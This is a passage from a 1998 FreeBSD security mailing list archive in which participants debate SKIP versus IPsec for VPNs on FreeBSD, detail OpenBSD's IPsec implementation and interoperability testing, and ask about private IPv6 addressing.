X6SC6SDJiXPy1sOFXXBBpSQrDqcPf5lEMMSLGec0K1oTYxNVGu5fZcrlZ+wA7Zow jXfHVSXd5w0= =g4GP -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 12:46:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA08111 for freebsd-security-outgoing; Thu, 28 May 1998 12:46:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA08083 for ; Thu, 28 May 1998 12:46:50 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost [127.0.0.1]) by dingo.cdrom.com (8.8.8/8.8.5) with ESMTP id LAA00771; Thu, 28 May 1998 11:40:23 -0700 (PDT) Message-Id: <199805281840.LAA00771@dingo.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: Atipa cc: "Angelos D. Keromytis" , Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-reply-to: Your message of "Wed, 27 May 1998 16:01:31 MDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 28 May 1998 11:40:23 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > > >OpenBSD just made a vpn command "that makes virtual private networks > > >trivial". I was messing around w/ IPsec and Photurisd and also got really > > >frustrated as well :(. > > > > > >Just FYI. > > > > "Trivial" is probably too strong a statement, but it certainly makes > > them easier. The biggest step is actually the existance of > > documentation. I should point out that OpenBSD does *not* use SKIP > > (nor is it likely to do so in the foreseeable future). ... thus making it incapable of interoperation with the various other platforms which do. That's Bad. -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 12:48:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA08586 for freebsd-security-outgoing; Thu, 28 May 1998 12:48:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA08320 for ; Thu, 28 May 1998 12:47:43 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu) Received: from dsl.cis.upenn.edu (localhost [127.0.0.1]) by adk.gr (8.8.8/8.8.5) with ESMTP id PAA26621; Thu, 28 May 1998 15:47:00 -0400 (EDT) Message-Id: <199805281947.PAA26621@adk.gr> To: Mike Smith Cc: Atipa , Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-reply-to: Your message of "Thu, 28 May 1998 11:40:23 PDT." <199805281840.LAA00771@dingo.cdrom.com> Date: Thu, 28 May 1998 15:47:00 -0400 From: "Angelos D. Keromytis" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- To: Mike Smith Subject: Re: SKIP problems Cc: Atipa , Date: 05/28/98, 15:46:59 In message <199805281840.LAA00771@dingo.cdrom.com>, Mike Smith writes: > >... thus making it incapable of interoperation with the various other >platforms which do. That's Bad. > Not that many platforms use SKIP. IPsec is the IP security standard, and not SKIP. No point supporting a bad standard-wannabe. - -Angelos -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNW2/NL0pBjh2h1kFAQGFHgP/XKKqGg0p9xYTyRm2EUSy3cYuDHl+NWj3 V2XyRJpY4ADwsqPWfGojpDRxewTeDK2BaN17AsmzGoPfiuMZGVQ3LAyfOByLtYmh kFbQK5ekRvqLT2L+6HwcQex6a8mIvZew/ApLBLyueChNxoxDP4OCgWYNrN9Er7z6 SvzBHokJRyo= =0XUb -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 14:31:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA00238 for freebsd-security-outgoing; Thu, 28 May 1998 14:31:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from vger.alaska.net (vger.alaska.net [209.112.156.61]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA00226 for ; Thu, 28 May 1998 14:31:42 -0700 (PDT) (envelope-from simestd@alaska.net) Received: from localhost (simestd@localhost) by vger.alaska.net (8.8.8/8.8.8) with SMTP id NAA22749; Thu, 28 May 1998 13:28:33 -0800 (AKDT) (envelope-from simestd@alaska.net) X-Authentication-Warning: vger.alaska.net: simestd owned process doing -bs Date: Thu, 28 May 1998 13:28:33 -0800 (AKDT) From: "Thomas D. Simes" To: "Angelos D. Keromytis" cc: Mike Smith , Atipa , Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-Reply-To: <199805281947.PAA26621@adk.gr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Thu, 28 May 1998, Angelos D. Keromytis wrote: > In message <199805281840.LAA00771@dingo.cdrom.com>, Mike Smith writes: > > > >... thus making it incapable of interoperation with the various other > >platforms which do. That's Bad. > > > > Not that many platforms use SKIP. IPsec is the IP security standard, > and not SKIP. No point supporting a bad standard-wannabe. > - -Angelos At the risk of asking an obvious question - how is IPsec currently implemented in FreeBSD? SKIP is something that can be used now - it may not be the best solution, but it is something that can be implemented today. Tom ====================================================================== Thomas D. Simes Chief Technology Instigator simestd@alaska.net Internet Alaska You are what you do when it counts. ====================================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 16:14:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA20369 for freebsd-security-outgoing; Thu, 28 May 1998 16:14:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from church.cse.ogi.edu (root@cse.ogi.edu [129.95.20.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA20328 for ; Thu, 28 May 1998 16:13:54 -0700 (PDT) (envelope-from jrb@cse.ogi.edu) Received: from cse.ogi.edu (jrb@church.cse.ogi.edu [129.95.42.2]) by church.cse.ogi.edu (8.8.6/8.8.6) with ESMTP id QAA10504; Thu, 28 May 1998 16:13:30 -0700 (PDT) Message-Id: <199805282313.QAA10504@church.cse.ogi.edu> To: "Thomas D. Simes" cc: freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-Reply-To: Your message of "Thu, 28 May 1998 13:28:33 -0800." Date: Thu, 28 May 1998 16:13:29 -0700 From: Jim Binkley Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk It's a good point Tom and it could stand MUCH clarification. (the how is IPSEC question, not the SKIP part. SKIP is not an IETF standard and was rejected by the IPSEC wg several years ago (along with photuris))... > >At the risk of asking an obvious question - how is IPsec currently >implemented in FreeBSD? SKIP is something that can be used now - it may >not be the best solution, but it is something that can be implemented >today. > >Tom I can think of at MANY different IPSEC implementations that could stand to learn from each other (I suspect). We have 1. freebsd/NRL/psu/me as found at http://www.cs.pdx.edu/research/SMN in case you have been asleep... VPNs via route(8), route(4), and keyadmin(1). I could try to briefly clarify on-line if there was interest. I suspect there are at least two or more IPSEC implementor (camps) that read this list. Maybe we could all do that (or I could just go on vacation). 1.1 the netbsd/NRL implementations 2. the openBSD used to be netBSD implementation. 3. the WIDE implementation 4. the NIST/linux implementation 5. and the soon to be unleashed Cisco IOS implementation :-> 6. bump in the stack implementations How they work and exactly what they do and do not do is not clear. IPSEC has specified packet formats, not app/kernel or user apis. The latter are important and different. There are many important questions; e.g., what about ISAKMP? what are the kernel interfaces? how do the kernel parts work? how do you add a new security transform? how tested is the code? (how buggy?) is the code well written? what is the user (or sysadmin) api? how does key management work? is ASN involved :-> does it support user-level or only network level? policy for packets in/out in the o.s.; i.e., when to IPSEC and when not? tunnel security attributes? could joe average routing daemon use it? multicast semantics? how many tons of docs, if any? you claim "interoperation", exactly what did that mean? end to end apps end to router tunnel AH with transform Y which AH acc. to which RFC/draft etc., etc., ... several things I haven't thought of to throw in the laundry list ... and of course, our favorite, export control aspects. Forgive me for this minor explosion. kind regards, Jim Binkley jrb@cse.ogi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 16:26:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA22654 for freebsd-security-outgoing; Thu, 28 May 1998 16:26:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA22634 for ; Thu, 28 May 1998 16:26:08 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu) Received: from dsl.cis.upenn.edu ([198.223.41.41]) by adk.gr (8.8.8/8.8.5) with ESMTP id TAA19747; Thu, 28 May 1998 19:25:17 -0400 (EDT) Message-Id: <199805282325.TAA19747@adk.gr> To: Mike Smith , Atipa Subject: Re: SKIP problems Cc: Open Systems Networking , freebsd-security@FreeBSD.ORG Date: Thu, 28 May 1998 19:20:32 EDT From: "Angelos D. Keromytis" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- To: Mike Smith , Atipa Subject: Re: SKIP problems Cc: Open Systems Networking , Date: 05/28/98, 19:20:27 > At the risk of asking an obvious question - how is IPsec currently > implemented in FreeBSD? SKIP is something that can be used now - it may > not be the best solution, but it is something that can be implemented > today. That was the topic of the discussion. I think it's fairly easy to port the OpenBSD IPsec, and there's the WIDE implementation (I'm told). - -Angelos -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNW3xP70pBjh2h1kFAQHqfgP/SKW9TWXETXcr+ADEBFFHQbO5DhuMArj8 3oWbRdEIhG9XjI0rMmG/YV8DD+DiTnXWzRc7iWbfeeX4zx0pWJBgA2zymMugVgRl kcoU8NvOxOYgW5k+RLWD3wSLQaRzvMabiSZcmwbM+/TLGndyEhYRLyZgVmhMLTB5 AxQX9N9zdq8= =yX0U -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 18:20:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA14183 for freebsd-security-outgoing; Thu, 28 May 1998 18:20:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA14154 for ; Thu, 28 May 1998 18:20:27 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu) Received: from dsl.cis.upenn.edu ([198.223.41.41]) by adk.gr (8.8.8/8.8.5) with ESMTP id VAA03275; Thu, 28 May 1998 21:19:30 -0400 (EDT) Message-Id: <199805290119.VAA03275@adk.gr> To: simestd@alaska.net Subject: Re: SKIP problems Cc: freebsd-security@FreeBSD.ORG Date: Thu, 28 May 1998 21:14:44 EDT From: "Angelos D. Keromytis" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- To: simestd@alaska.net Subject: Re: SKIP problems Cc: freebsd-security@FreeBSD.ORG Date: 05/28/98, 21:14:42 > SKIP is not an IETF standard and was rejected by the IPSEC wg several > years ago (along with photuris))... Touche' Although the circumstances were different in the two situations. > 1. freebsd/NRL/psu/me as found at http://www.cs.pdx.edu/research/SMN > in case you have been asleep... VPNs via route(8), route(4), > and keyadmin(1). I could try to briefly clarify on-line if Sounds similar to the OpenBSD code, although I haven't seen the NRL code (being a foreigner and all that). > there was interest. I suspect there are at least two or more > IPSEC implementor (camps) that read this list. Maybe we could > all do that (or I could just go on vacation). FYI, the linux-ipsec@clinet.fi mailing list (which was originally intended to be the FreeSWAN list) has occasionally interesting discussions, and at least 4 or 5 implementors are on it (that I know of). > 2. the openBSD used to be netBSD implementation. ...used to be BSD/OS :-) > what about ISAKMP? Not using it. No good free implementations available (yet). FreeSWAN is working on it, maybe when they have something stable. > what are the kernel interfaces? PF_ENCAP (looks like a simplified PF_KEYv2) > how do the kernel parts work? http://www.cis.upenn.edu/~angelos/ipsec.ps.gz >how do you add a new security transform? ipsecadm (1) or photurisd (8) and possibly isakmp in the future >how tested is the code? (how buggy?) The first version of the code was written back in 1995. I can't claim that there aren't any bugs left, but the code has been tested (and is being tested) and used > is the code well written? I'm probably biased, but I've heard from 3 people who have no connection to the project that it's well written and tight. It's at least reasonably good. > what is the user (or sysadmin) api? PF_ENCAP..expect a draft soon >how does key management work? Which part ? > is ASN involved :-> No! > does it support user-level or only network level? Supports both user-level and network level. It'll at some point be able to also act as bump-in-the-wire >policy for packets in/out in the o.s.; i.e., when to IPSEC > and when not? Outgoing packets based on source/destination addresses (possibly subnetted), transport protocol, UDP/TCP source/destination ports. Recently added per-socket policies with the automated keying. > tunnel security attributes? Yes. > could joe average routing daemon use it? Routing daemon ?! You could have your routing infrastructure point everything at your IPsec firewall, if that's what you mean. > multicast semantics? Not completed (yet). We haven't focused on that, since there hasn't been much demand on it (yet). > how many tons of docs, if any? Not many. Some man pages, a paper (URL above). A short article in the OpenBSD Journal. >you claim "interoperation", exactly what did that mean? > end to end apps > end to router tunnel > AH with transform Y > which AH acc. to which RFC/draft End-to-end, firewall-to-firewall tunnel telnet, ping and ftp. Have tested: old ESP DES and 3DES old AH MD5 and SHA1 new ESP DES and 3DES, with MD5 and SHA1 new AH MD5 and SHA1 I believe Rodney Thayer (rodney@sabletech.com) maintains a sort-of-recent interoperability matrix, you can find OpenBSD there. The most recent tests were last September at the ANX Interop Workshop in Ottawa (interoped with 2-3 implementors, I remember mentat.com and I think IBM), and at SNDSS at the end of March with Dan McDonald (Sun Microsystems -- Solaris implementation). We also support RIPEMD-160 authentication and CAST128 and Blowfish encryption. >and of course, our favorite, export control aspects. No export control, as the code was written, lives and is being maintained outside the US. Hope this is informational enough. Cheers, - -Angelos -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNW4MAr0pBjh2h1kFAQFBpwQAhAPJqPIW39D8efkBwsmd7RxqT5oarcVH l1FJayHW2z7T9qqvOriklnMXOZ4E/m0bZzOgfBjj960sdZiJNKK29fBhxVeubuQJ 2ol26SAcGYtfAFuGOZMY6FMxCJhK9fxgM8NFOUkVcV2lvAx/jbUqgJz2SD6pHbZ3 tXmVyNAiNLM= =HxLS -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 20:48:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA09054 for freebsd-security-outgoing; Thu, 28 May 1998 20:48:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from super-g.inch.com (super-g.com [207.240.140.161]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA09028 for ; Thu, 28 May 1998 20:48:27 -0700 (PDT) (envelope-from spork@super-g.com) Received: from localhost (localhost [127.0.0.1]) by super-g.inch.com (8.8.8/8.8.5) with SMTP id XAA16681; Thu, 28 May 1998 23:47:23 -0400 (EDT) Date: Thu, 28 May 1998 23:47:23 -0400 (EDT) From: spork X-Sender: spork@super-g.inch.com To: Open Systems Networking cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > I was going to write a section in the handbook for SKIP once I got it > working but im quite convinced SKIP sucks, and while no one likes writing > doc's I have seen more documentation on "undocumented" kernel options > thatn SKIP. Im sure once its working it is probably nice, but I think the > implementation must be piss poor if so many people are finding it > impossible to get configured. It seems particularly difficult to make it work from FBSD<->win95... Reminded me of getting the windows 5.5.5 pgp to work with the ol' 2.6.3 on Unix... There's always gotta be a 'gotcha'. Charles > > > Agreed on both accounts. Keep in touch w/ me if you want testers, etc. > > I'd be happy to test it as well. > > Chris > > -- > "I don't do favors, I accumulate debts" > > ===================================| Open Systems Networking And Consulting. > FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 > -----------------------------------| 1402 N. Washington, Wellington, KS-67152 > FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net > http://www.freebsd.org | Consulting-Network Engineering-Security > ===================================| http://open-systems.net > > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te > gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC > foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z > d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb > NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv > CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 > b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= > =BBjp > -----END PGP PUBLIC KEY BLOCK----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 28 22:21:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA27697 for freebsd-security-outgoing; Thu, 28 May 1998 22:21:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wumpus.its.uow.edu.au (wumpus.its.uow.edu.au [130.130.68.12]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA27657 for ; Thu, 28 May 1998 22:21:00 -0700 (PDT) (envelope-from ncb05@uow.edu.au) Received: from banshee.cs.uow.edu.au (ncb05@banshee.cs.uow.edu.au [130.130.188.1]) by wumpus.its.uow.edu.au (8.9.0.Beta5/8.9.0.Beta5) with SMTP id PAA04502 for ; Fri, 29 May 1998 15:20:53 +1000 (EST) Date: Fri, 29 May 1998 15:20:52 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: freebsd-security@FreeBSD.ORG Subject: ipv6 network addresses Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Is there an equivalent rfc (to 1918) that covers what network addresses you can use for internal ipv6 networks? I know that it's not really worth worrying about at this stage, but it would be good to know regardless. :) This might be more for -hackers or -chat, but i thought that it would be appropriate given the current thread on ipv6 & ipsec implementations. Nick -- Email: ncb05@uow.edu.au - DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A http://rabble.uow.edu.au/~nick - public key available on request. Nicholas Brawn - Computer Science Undergraduate, University of Wollongong. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 05:30:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA16911 for freebsd-security-outgoing; Fri, 29 May 1998 05:30:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lily.ezo.net (root@lily.ezo.net [206.102.130.13]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA16799 for ; Fri, 29 May 1998 05:30:16 -0700 (PDT) (envelope-from jflowers@ezo.net) Received: from violet.eznets.canton.oh.us (p143.ezo.net [206.102.130.75]) by lily.ezo.net (8.8.7/8.8.7) with SMTP id IAA03458; Fri, 29 May 1998 08:28:32 -0400 (EDT) From: "Jim Flowers" To: "spork" , "Open Systems Networking" Cc: Subject: Re: FreeBSD Tunneling Date: Fri, 29 May 1998 08:29:07 -0400 Message-ID: <01bd8afd$5fdb2bc0$8a8266ce@violet.eznets.canton.oh.us> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.71.1712.3 X-MimeOLE: Produced By Microsoft MimeOLE V4.71.1712.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk I have no particular interest in defending SKIP which is available for FreeBSD only because DEC did a reference implementation back at 2.1.0 and 2.1.5. I had to do quite a bit of code juggling to get it to compile with 2.2.5 which resulted in a pretty good understanding of how it works. I have used it successfully with fbsd to fbsd and Win95 to NT. From NT/Win95 to fbsd it provides authentication and encapsulation but with no common encryption methods for transit keys it's in cleartext. I also use an upgrade (3.0?) for the NT/Win95 program which may not have ever been released, freely. I found that there was a great deal of documentation of very high quality at the user level including a fairly decent powerpoint presentation. The "how it works" at the program level could use updating to match the current operation but it's a 10% job, not a 90% job. And of course it could benefit from patches to use with current. There are three or four modules that are caught in macro processing differences from 2.1.X to 2.2.X. All told, I think it's a currently usable option for someone willing to spend the time. I have one tunnel coupling two private networks over the Internet with full encryption and encapsulation running for six months without a hiccup. -----Original Message----- From: spork To: Open Systems Networking Cc: freebsd-security@FreeBSD.ORG Date: Friday, May 29, 1998 1:01 AM Subject: Re: FreeBSD Tunneling > >> I was going to write a section in the handbook for SKIP once I got it >> working but im quite convinced SKIP sucks, and while no one likes writing >> doc's I have seen more documentation on "undocumented" kernel options >> thatn SKIP. Im sure once its working it is probably nice, but I think the >> implementation must be piss poor if so many people are finding it >> impossible to get configured. > >It seems particularly difficult to make it work from FBSD<->win95... >Reminded me of getting the windows 5.5.5 pgp to work with the ol' 2.6.3 on >Unix... There's always gotta be a 'gotcha'. > >Charles > >> >> > Agreed on both accounts. Keep in touch w/ me if you want testers, etc. >> >> I'd be happy to test it as well. >> >> Chris >> >> -- >> "I don't do favors, I accumulate debts" >> >> ===================================| Open Systems Networking And Consulting. >> FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 >> -----------------------------------| 1402 N. Washington, Wellington, KS-67152 >> FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net >> http://www.freebsd.org | Consulting-Network Engineering-Security >> ===================================| http://open-systems.net >> >> -----BEGIN PGP PUBLIC KEY BLOCK----- >> Version: 2.6.2 >> >> mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te >> gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC >> foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z >> d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb >> NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv >> CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 >> b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= >> =BBjp >> -----END PGP PUBLIC KEY BLOCK----- >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe security" in the body of the message >> > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 05:38:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA18961 for freebsd-security-outgoing; Fri, 29 May 1998 05:38:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA18930 for ; Fri, 29 May 1998 05:38:13 -0700 (PDT) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id IAA17169; Fri, 29 May 1998 08:32:24 -0400 (EDT) Date: Fri, 29 May 1998 08:38:01 -0400 (EDT) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: Jim Flowers cc: spork , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-Reply-To: <01bd8afd$5fdb2bc0$8a8266ce@violet.eznets.canton.oh.us> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Fri, 29 May 1998, Jim Flowers wrote: > I have no particular interest in defending SKIP which is available for > FreeBSD only because DEC did a reference implementation back at 2.1.0 and > 2.1.5. I had to do quite a bit of code juggling to get it to compile with > 2.2.5 which resulted in a pretty good understanding of how it works. I have > used it successfully with fbsd to fbsd and Win95 to NT. From NT/Win95 to > fbsd it provides authentication and encapsulation but with no common > encryption methods for transit keys it's in cleartext. I also use an > upgrade (3.0?) for the NT/Win95 program which may not have ever been > released, freely. > > I found that there was a great deal of documentation of very high quality at > the user level including a fairly decent powerpoint presentation. The "how > it works" at the program level could use updating to match the current > operation but it's a 10% job, not a 90% job. Care to write up how you accomplished this? Chris -- "I don't do favors, I accumulate debts" ===================================| Open Systems Networking And Consulting. FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 -----------------------------------| 1402 N. Washington, Wellington, KS-67152 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting-Network Engineering-Security ===================================| http://open-systems.net -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= =BBjp -----END PGP PUBLIC KEY BLOCK----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 07:54:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA26852 for freebsd-security-outgoing; Fri, 29 May 1998 07:54:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA26768 for ; Fri, 29 May 1998 07:54:13 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id KAA12201 for ; Fri, 29 May 1998 10:53:50 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id KAA21194 for ; Fri, 29 May 1998 10:53:51 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id KAA11914; Fri, 29 May 1998 10:53:51 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Fri, 29 May 1998 10:53:51 -0400 (EDT) Message-Id: <199805291453.KAA11914@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-Reply-To: Angelos D. Keromytis's message of "Thu, May 28, 1998 15:47:00 -0400" regarding "Re: SKIP problems " id <199805281947.PAA26621@adk.gr> References: <199805281840.LAA00771@dingo.cdrom.com> <199805281947.PAA26621@adk.gr> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Thu, May 28, 1998 at 15:47:00 (-0400), Angelos D. Keromytis wrote: ] > Subject: Re: SKIP problems > > Not that many 